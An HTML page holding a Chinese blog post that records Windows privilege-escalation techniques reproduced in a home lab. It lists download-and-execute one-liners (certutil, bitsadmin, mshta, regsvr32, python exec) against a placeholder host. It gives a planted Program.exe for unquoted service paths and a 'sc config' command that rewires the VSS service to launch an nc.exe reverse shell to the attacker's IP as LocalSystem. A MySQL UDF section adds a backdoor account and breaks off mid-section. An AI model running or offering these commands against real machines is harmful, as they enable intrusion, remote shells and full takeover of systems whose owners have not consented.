<!DOCTYPE html>




<html class="theme-next gemini" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="windows,">










<meta name="description" content="前言记录并复现提权的常用姿势，方便在以后理解并使用。     为什么要提权？因为一般我们通过web获取到的系统管理权限非常低，比如linux下的话通常就是www权限，这个权限基本限制了我们只能在web目录下执行一些有限的操作。   那么想要获取到系统更多的信息和进行更多的操作，就需要更高的权限。通常常用的两个系统高权限：Linux：root权限Windows：system权限">
<meta name="keywords" content="windows">
<meta property="og:type" content="article">
<meta property="og:title" content="windows部分提权方法复现和记录">
<meta property="og:url" content="http://yoursite.com/2019/10/07/windows部分提权方法复现和记录/index.html">
<meta property="og:site_name" content="故人梦">
<meta property="og:description" content="前言记录并复现提权的常用姿势，方便在以后理解并使用。     为什么要提权？因为一般我们通过web获取到的系统管理权限非常低，比如linux下的话通常就是www权限，这个权限基本限制了我们只能在web目录下执行一些有限的操作。   那么想要获取到系统更多的信息和进行更多的操作，就需要更高的权限。通常常用的两个系统高权限：Linux：root权限Windows：system权限">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://k-ring.github.io/img/windows1.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/windows2.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/windows12.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/windows13.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/windows3.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/windows4.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/windows5.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/windows6.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/windows7.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/windows8.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/windows9.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/windows10.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/windows11.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/windows14.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/windows15.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/windows16.jpg">
<meta property="og:updated_time" content="2019-10-12T01:52:10.418Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="windows部分提权方法复现和记录">
<meta name="twitter:description" content="前言记录并复现提权的常用姿势，方便在以后理解并使用。     为什么要提权？因为一般我们通过web获取到的系统管理权限非常低，比如linux下的话通常就是www权限，这个权限基本限制了我们只能在web目录下执行一些有限的操作。   那么想要获取到系统更多的信息和进行更多的操作，就需要更高的权限。通常常用的两个系统高权限：Linux：root权限Windows：system权限">
<meta name="twitter:image" content="https://k-ring.github.io/img/windows1.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/10/07/windows部分提权方法复现和记录/">





  <title>windows部分提权方法复现和记录 | 故人梦</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">故人梦</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">至今朝，忆往昔、</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-resources">
          <a href="/resources/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-modx"></i> <br>
            
            资源
          </a>
        </li>
      
        
        <li class="menu-item menu-item-link">
          <a href="/link/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-link"></i> <br>
            
            友链
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/10/07/windows部分提权方法复现和记录/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="故人梦">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="故人梦">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">windows部分提权方法复现和记录</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-10-07T00:00:00+08:00">
                2019-10-07
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/提权/" itemprop="url" rel="index">
                    <span itemprop="name">提权</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  3,817 字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  15 分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>记录并复现提权的常用姿势，方便在以后理解并使用。    </p>
<p>为什么要提权？<br>因为一般我们通过web获取到的系统管理权限非常低，比如linux下的话通常就是www权限，这个权限基本限制了我们只能在web目录下执行一些有限的操作。  </p>
<p>那么想要获取到系统更多的信息和进行更多的操作，就需要更高的权限。通常常用的两个系统高权限：<br>Linux：root权限<br>Windows：system权限<br><a id="more"></a></p>
<h2 id="Windows提权命令记录"><a href="#Windows提权命令记录" class="headerlink" title="Windows提权命令记录"></a>Windows提权命令记录</h2><table>
<thead>
<tr>
<th>命令</th>
<th>作用</th>
</tr>
</thead>
<tbody>
<tr>
<td>systeminfo</td>
<td>获取系统信息</td>
</tr>
<tr>
<td>whoami</td>
<td>获得当前用户名</td>
</tr>
<tr>
<td>whoami \/priv</td>
<td>当前账号权限</td>
</tr>
<tr>
<td>ipconfig</td>
<td>网络配置信息</td>
</tr>
<tr>
<td>ipconfig \/displaydns</td>
<td>显示DNS缓存</td>
</tr>
<tr>
<td>route print</td>
<td>打印出路由表</td>
</tr>
<tr>
<td>arp -a</td>
<td>打印arp表</td>
</tr>
<tr>
<td>hostname</td>
<td>获取主机名</td>
</tr>
<tr>
<td>net user</td>
<td>列出用户</td>
</tr>
<tr>
<td>net user <username></username></td>
<td>关于用户的信息</td>
</tr>
<tr>
<td>net use \SMBPATH <password> \/u:<username></username></password></td>
<td>连接SMB</td>
</tr>
<tr>
<td>net localgroup</td>
<td>列出所有组</td>
</tr>
<tr>
<td>net localgroup <groupname></groupname></td>
<td>关于指定组的信息</td>
</tr>
<tr>
<td>net view \127.0.0.1</td>
<td>会话打开到当前计算机</td>
</tr>
<tr>
<td>net session</td>
<td>开放给其他机器</td>
</tr>
<tr>
<td>netsh firewall show config</td>
<td>显示防火墙配置</td>
</tr>
<tr>
<td>DRIVERQUERY</td>
<td>列出安装的驱动</td>
</tr>
<tr>
<td>tasklist /svc</td>
<td>列出服务任务</td>
</tr>
<tr>
<td>net start</td>
<td>列出启动的服务</td>
</tr>
<tr>
<td>sc query</td>
<td>列出所有服务</td>
</tr>
<tr>
<td>sc qc <servicename></servicename></td>
<td>找到指定服务的路径</td>
</tr>
<tr>
<td>shutdown /r /t 0</td>
<td>立即重启</td>
</tr>
<tr>
<td>type <filename></filename></td>
<td>打印出文件内容</td>
</tr>
<tr>
<td>icacls “C:\Example”</td>
<td>列出权限</td>
</tr>
<tr>
<td>wmic qfe get Caption,Description,HotFixID,InstalledOn</td>
<td>列出已安装的补丁</td>
</tr>
<tr>
<td>accesschk.exe -qwsu “Group”</td>
<td>修改对象(尝试Everyone，Authentication，Users)</td>
</tr>
</tbody>
</table>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">// Windows命令行下载文件命令</span><br><span class="line"></span><br><span class="line">// powershell</span><br><span class="line">(New-Object System.Net.WebClient).DownloadFile(&quot;http://RemoteHost/file&quot;,&quot;c:\LocalPath\file&quot;)</span><br><span class="line"></span><br><span class="line">// ftp</span><br><span class="line">ftp &lt;RemoteHost&gt;</span><br><span class="line">lcd E:\file       // 进入E盘下的file目录</span><br><span class="line">cd www            // 进入服务器上的www目录</span><br><span class="line">get access.log    // 将服务器上的access.log下载到E:\file</span><br><span class="line"></span><br><span class="line">// IPC$</span><br><span class="line">copy \192.168.3.1\c$\test.exe E:\test.exe</span><br><span class="line"></span><br><span class="line">// Certutil</span><br><span class="line">certutil -urlcache -split -f http://xxx.xxx.xxx/filename c:\filename</span><br><span class="line"></span><br><span class="line">// bitsadmin</span><br><span class="line">bitsadmin /rawreturn /transfer getfile http://xxx.xxx.xxx/filename c:\filename</span><br><span class="line">bitsadmin /rawreturn /transfer getpayload http://xxx.xxx.xxx/filename c:\filename</span><br><span class="line"></span><br><span class="line">// msiexec</span><br><span class="line">msiexec /q /i http://xxx.xxx.xxx/filename</span><br><span class="line"></span><br><span class="line">// IEExec</span><br><span class="line">caspol -s off</span><br><span class="line">IEExec http://xxx.xxx.xxx/filename</span><br><span class="line"></span><br><span class="line">// python</span><br><span class="line">python -c &quot;import urllib2; exec urllib2.urlopen(&apos;http://xxx.xxx.xxx/filename&apos;).read();&quot;</span><br><span class="line"></span><br><span class="line">// mshta</span><br><span class="line">mshta http://xxx.xxx.xxx/filename</span><br><span class="line"></span><br><span class="line">// regsvr32</span><br><span class="line">regsvr32 /u /s /i:http://xxx.xxx.xxx/filename c:\filename</span><br></pre></td></tr></table></figure>
<h2 id="本地提权exp"><a href="#本地提权exp" class="headerlink" title="本地提权exp"></a>本地提权exp</h2><p>因为系统漏洞未打补丁导致的本地提权漏洞。   </p>
<p>如何测试：检车系统系统上最新补丁的日期，如果它比漏洞利用程序更旧，那么这个系统肯能就存在漏洞。   </p>
<p>通过systeminfo查看系统补丁情况，查看最后一个打补丁的时间，然后看之后的时间段是否存在新出来的漏洞利用程序。   </p>
<p>windows漏洞 exp的网站：   </p>
<ul>
<li><a href="https://github.com/SecWiki/windows-kernel-exploits" target="_blank" rel="noopener">https://github.com/SecWiki/windows-kernel-exploits</a>   </li>
<li><a href="https://pentestlab.blog/2017/04/24/windows-kernel-exploits/" target="_blank" rel="noopener">https://pentestlab.blog/2017/04/24/windows-kernel-exploits/</a>  </li>
<li><a href="https://www.exploit-db.com/" target="_blank" rel="noopener">https://www.exploit-db.com/</a></li>
</ul>
<h2 id="通过系统服务提权"><a href="#通过系统服务提权" class="headerlink" title="通过系统服务提权"></a>通过系统服务提权</h2><p>通常来说直接攻击系统内核来进行提权的话容易将系统打蓝屏或者重启，为了尽量避免这样的问题，我们应当先考虑从系统上的一些服务入手进行提权，避免直接对系统内核操作，引起大的动静。  </p>
<h3 id="不带引号的服务路径"><a href="#不带引号的服务路径" class="headerlink" title="不带引号的服务路径"></a>不带引号的服务路径</h3><p>这种情况的利用存在于：当管理员配置Windows服务的时候(比如启动一个服务时)，是在命令行或者shell终端上操作的。    </p>
<p>如果在命令行给出了可执行文件的完整路径，那么系统就会按照路径去寻找这个可执行的二进制文件，如果是整个路径用引号包裹，那么系统会寻找这个完整的路径，但是<strong>如果在执行这个可执行文件的时候没有使用引号包裹，而这个完整路径当中又存在空格的话，那么操作系统就会将空格分隔的第一段路径当做一个可执行文件去执行。</strong>   </p>
<p>例如：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\gurenmeng&gt;&quot;C:\Program Files (x86)\GenuinePlatform 3\gpservice.exe&quot;</span><br></pre></td></tr></table></figure></p>
<p>我这样通过一个完整路径去执行gpservice.exe这个可执行程序的时候，操作系统会正常解析，找到这个二进制文件。   </p>
<p>但是如果我不加引号：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\gurenmeng&gt;C:\Program Files (x86)\GenuinePlatform 3\gpservice.exe</span><br></pre></td></tr></table></figure></p>
<p><img src="https://k-ring.github.io/img/windows1.jpg" alt><br>它就是这样的，将空格前半截<code>C:\Program</code>当做了一个可执行程序来执行，但是在C盘根目录下没有<code>Program.exe</code>这个文件，显然就会报错。  </p>
<p>但是如果这时我写一个恶意程序，将它命名为<code>Program.exe</code>，然后放到C盘根目录下，我再输入上面的不加引号的完整路径会怎么样:<br>示例代码：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"C is good language!\n"</span>);</span><br><span class="line">	system(<span class="string">"whoami"</span>);</span><br><span class="line">	system(<span class="string">"pause"</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>然后编译成exe，命名为Program.exe，放入到C盘根目录，再执行：<br><img src="https://k-ring.github.io/img/windows2.jpg" alt>   </p>
<p>这次遇到空格，它会去执行<code>C:\Program.exe</code>程序，由于我们给它上传了一个Porgram.exe，所以执行了我们的恶意程序。   </p>
<p>寻找这些不加引号的错误配置：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic service get name,displayname,pathname,startmode |findstr /i &quot;Auto&quot; |findstr /i /v &quot;C:\Windows\\&quot; |findstr /i /v &quot;&quot;&quot;</span><br></pre></td></tr></table></figure></p>
<h4 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h4><p>我们找到一个服务存在这样的问题，然后就是想如何去利用它。<br>使用上述的命令找出有哪些服务没有加引号：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic service get name,displayname,pathname,startmode |findstr /i &quot;Auto&quot; |findstr /i /v &quot;C:\Windows\\&quot; |findstr /i /v &quot;&quot;&quot;</span><br></pre></td></tr></table></figure></p>
<p><img src="https://k-ring.github.io/img/windows12.jpg" alt>   </p>
<p>我这里存在三个服务是不加引号的错误配置，在<code>C:\Program File (x86)</code>这里存在空格，要使服务再次启动时调用我们的恶意程序，我们应该有一个名为Program.exe的恶意程序放在C盘根目录下，当重启服务，遇到空格时就会调用C:\Program.exe程序。     </p>
<p>我的恶意程序代码：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Program.c</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line">	system(<span class="string">"whoami &gt; D:\\whoami.txt"</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>然后编译成<code>Program.exe</code>文件，放到C盘根目录下。    </p>
<p>重新启动服务，此处可能由于权限低，无法重启服务，那么就只有强制重启服务器<code>shutdown -r -t0</code>，当服务器重新开启时，就能运行我们的恶意程序。    </p>
<p><img src="https://k-ring.github.io/img/windows13.jpg" alt>    </p>
<p>成功获取到system权限。    </p>
<h4 id="需要条件"><a href="#需要条件" class="headerlink" title="需要条件"></a>需要条件</h4><ul>
<li>需要重新启动服务器，会对服务器上面的业务产生影响。   </li>
<li>需要服务路径中存在空格   </li>
<li>需要对路径中的目录有可写入权限   </li>
<li>服务路径不加引号   </li>
</ul>
<h3 id="不安全的服务权限"><a href="#不安全的服务权限" class="headerlink" title="不安全的服务权限"></a>不安全的服务权限</h3><p>不安全的服务权限这个比较有意思，对我来说一切都是新东西，复现这个过程中遇到了很多问题，但是最终成功复现。    </p>
<h4 id="提权原理"><a href="#提权原理" class="headerlink" title="提权原理"></a>提权原理</h4><p>首先我们获取到了一个webshell，但是该shell的用户权限比较低，通过这种方式提升权限：首先<code>whoami</code>查看用户名，然后看属于哪个用户组，使用<code>accesschk</code>查看该windows上有哪些服务权限配置错误，通过修改该服务启动内容和使用高权限启动服务，从而获取到高权限的shell。   </p>
<h4 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h4><p>首先是环境准备：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">攻击机：  windows10    ip：192.168.159.165</span><br><span class="line"></span><br><span class="line">被攻击机：windows7     ip：192.168.159.173</span><br></pre></td></tr></table></figure></p>
<p>在windows10上通过中国蚁剑连接上windows7的shell：<br><img src="https://k-ring.github.io/img/windows3.jpg" alt>      </p>
<p>上传accesschk.exe文件到服务器web目录，再上传nc.exe文件到服务器（此处我上传到了C:\windows\temp\nc.exe，如果有权限问题可以就上传在web目录）。    </p>
<p>利用服务提权开始：    </p>
<p><img src="https://k-ring.github.io/img/windows4.jpg" alt>   </p>
<p>使用<code>whoami</code>查看用户名，然后<code>net user &lt;用户名&gt;</code>查看该用户名属于哪个组，这里<code>kr</code>用户属于<code>administrators</code>组，然后就要使用<code>acesschk.exe</code>工具了     </p>
<blockquote>
<p>这个工具用来检查用户和用户组对文件，目录，注册表项，全局对象和系统服务的权限   </p>
</blockquote>
<p>accesschk的参数(官网可下载)：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">-a:Windows账户权限</span><br><span class="line">-c:显示服务名称</span><br><span class="line">-d:仅处理目录或顶级键</span><br><span class="line">-e:只显示设置的完整性级别</span><br><span class="line">-f:显示包含组合特权的完整过程令牌信息</span><br><span class="line">-k:注册表键值</span><br><span class="line">-I:在取消完全访问控制列表时忽略只继承符的对象</span><br><span class="line">-l:显示全部访问列表</span><br><span class="line">-n:仅显示没有访问权限的对象</span><br><span class="line">-o:名称是对象管理器命名空间中的一个对象</span><br><span class="line">-p:进程名或者PID</span><br><span class="line">-q:省略标识</span><br><span class="line">-r:显示对象只读属性</span><br><span class="line">-s:递归</span><br><span class="line">-t:对象类型赛选器</span><br><span class="line">-u:抑制错误</span><br><span class="line">-v:冗长</span><br><span class="line">-w:仅显示具有写访问权限的对象</span><br></pre></td></tr></table></figure></p>
<p>所以用这个工具来检测是否存在权限配置不当的服务<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"># accesschk.exe -uwcqv &quot;&lt;用户组&gt;&quot; *</span><br><span class="line"></span><br><span class="line">accesschk.exe -uwcqv &quot;administrators&quot; *</span><br></pre></td></tr></table></figure></p>
<p><img src="https://k-ring.github.io/img/windows5.jpg" alt>    </p>
<p>前面有一个RW，代表可读可写，后面的就是服务名称（因为我这个用户加到了管理组，所以服务会比较多，不过不影响复现）   </p>
<p>在里面随便选择一个服务名称，然后使用<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net start &lt;ServiceName&gt;</span><br></pre></td></tr></table></figure></p>
<p>看能不能成功启动服务，如果显示<code>拒绝访问</code>则表示没有权限，那么就换其他服务，直到找到一个能成功启动的服务：<br><img src="https://k-ring.github.io/img/windows6.jpg" alt>    </p>
<p><code>VSS</code>服务能成功启动，所以这里我选择使用<code>VSS</code>服务。     </p>
<p>使用<code>sc qc VSS</code>命令查看该服务信息：<br><img src="https://k-ring.github.io/img/windows7.jpg" alt>   </p>
<p>在<code>BINARY_PATH_NAME</code>参数的内容<code>C:\Windows\system32\vssvc.exe</code>就是当VSS服务启动时系统调用的命令，<code>SERVICE_START_NAME</code>参数内容就是该服务运行时的权限。<br>我们要做的就是将前一个参数内容植入我们的payload(此处payload为nc调用cmd反弹shell的命令)，后一个参数改为系统权限LocalSystem。     </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sc config VSS binpath= &quot;C:\windows\temp\nc.exe -nv 192.168.159.165 -e C:\windows\system32\cmd.exe&quot;</span><br><span class="line"></span><br><span class="line">sc qc VSS</span><br><span class="line"></span><br><span class="line">sc config VSS obj= &quot;.\LocalSystem&quot; password= &quot;&quot;</span><br></pre></td></tr></table></figure>
<p><img src="https://k-ring.github.io/img/windows8.jpg" alt><br>(我之前已经复现过，所以这里第二个参数已经被我改了，不用纠结我还没有设置运行权限就已经是LocalSystem，如果设置过程中发现没有权限可以换一个其他服务)    </p>
<p>启动内容和启动权限设置好了，通过<code>sc qc VSS</code>查看该服务内容是否被成功修改。     </p>
<p>如果修改成功，后面只需启动服务即可反弹一个system权限的shell：    </p>
<p>首先在本地监听一个端口：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc.exe -lvvp 9999</span><br></pre></td></tr></table></figure></p>
<p><img src="https://k-ring.github.io/img/windows9.jpg" alt>   </p>
<p>然后再蚁剑的终端上重新启动服务：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">net stop VSS</span><br><span class="line">net start VSS</span><br></pre></td></tr></table></figure></p>
<p><img src="https://k-ring.github.io/img/windows10.jpg" alt>    </p>
<p><img src="https://k-ring.github.io/img/windows11.jpg" alt>   </p>
<p>成功获取到<code>system</code>权限的shell      </p>
<h4 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h4><p><a href="在Windows低权限下利用服务进行提权">在Windows低权限下利用服务进行提权</a>   </p>
<h4 id="利用总结"><a href="#利用总结" class="headerlink" title="利用总结"></a>利用总结</h4><ul>
<li>首先要有权限配置错误的服务    </li>
<li>有权限通过<code>sc</code>修改服务参数    </li>
<li>有权限使用<code>net start &lt;ServiceName&gt;</code>重启服务(此处没有权限可以强制重新启动服务器也可达到效果<code>shutdown -r -t 0</code>，不推荐)   </li>
</ul>
<h3 id="UDF提权"><a href="#UDF提权" class="headerlink" title="UDF提权"></a>UDF提权</h3><p>udf即是(user defined function)用户自定义函数的意思，用户通过上传一个自定义的dll文件(动态链接库，包含了恶意代码，可以执行系统命令，达到提权的效果)，然后调用系统命令。   </p>
<p>(<strong>本地复现未成功，以下文字描述</strong>)<br>有两种情况，一种是有webshell，可以直接上传文件；第二种就是通过注入调用mysql的相关函数    </p>
<h4 id="通过webshell上传文件"><a href="#通过webshell上传文件" class="headerlink" title="通过webshell上传文件"></a>通过webshell上传文件</h4><p>1、根据mysql版本不同，将dll文件上传到不同的目录。<br>首先查看mysql版本<code>select @@version</code><br>通过<code>select @@basedir</code>或者<code>show variables like &#39;plugin%&#39;</code>查看插件放置位置    </p>
<p>在本地mysql执行<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">create function sys_exec returns string soname &apos;udf.dll&apos;;</span><br></pre></td></tr></table></figure></p>
<p>(此处本地复现不成功)</p>
<p>得到udf.dll，上传该文件到服务器指定目录。    </p>
<p>2、上传成功后可以调用相关的函数来执行系统命令   </p>
<p>执行系统命令<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select sys_exec(&apos;whoami&apos;);</span><br><span class="line">select sys_exec(&apos;net user hack hack /add&apos;);</span><br><span class="line">......</span><br></pre></td></tr></table></figure></p>
<h4 id="通过注入生成udf-dll文件"><a href="#通过注入生成udf-dll文件" class="headerlink" title="通过注入生成udf.dll文件"></a>通过注入生成udf.dll文件</h4><p>1、首先查看mysql数据库版本<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select @@version;</span><br></pre></td></tr></table></figure></p>
